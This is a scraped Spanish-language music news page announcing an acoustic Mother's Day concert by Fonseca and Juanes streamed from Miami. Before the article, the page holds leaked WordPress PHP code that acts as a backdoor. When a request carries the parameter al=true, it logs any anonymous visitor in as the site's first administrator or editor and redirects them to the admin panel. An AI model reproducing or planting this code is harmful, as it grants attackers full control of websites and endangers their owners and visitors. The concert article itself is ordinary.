// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Fonseca y Juanes les cantan a las madres en su día - Dicomania Tu Manía
MusicManía

Fonseca y Juanes les cantan a las madres en su día

A estos cantautores los une más que el amor por la música. Han hecho colaboraciones juntos que han puesto a cantar a más de uno, con temas como el amor, el desamor, la patria, y muchos temas más con los que nos identificamos.

Ambos artistas se unen para rendirle homenaje a las madres este 10 de mayo durante la cuarentena, para llevar esperanza, fuerza y mucho amor a cada una de las madres colombianas y del mundo con una serenata dedicada a ellas.

Teniendo como pilar el amor que ambos tienen por sus madres, harán un concierto acústico desde Miami, dedicado a todas las madres del mundo. Los músicos de Juanes serán los ancargados de la parte acústico de este concierto, contando en la guitarra con Juan Pablo Daza y en el teclado, Emanuel Briceño. Juntos harán, este próximo domingo a partir de las 4:00 p.m hora Colombia.

Advertisements

El concierto se podrá ver desde los canales de YouTube de los cantantes.

 

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

To Top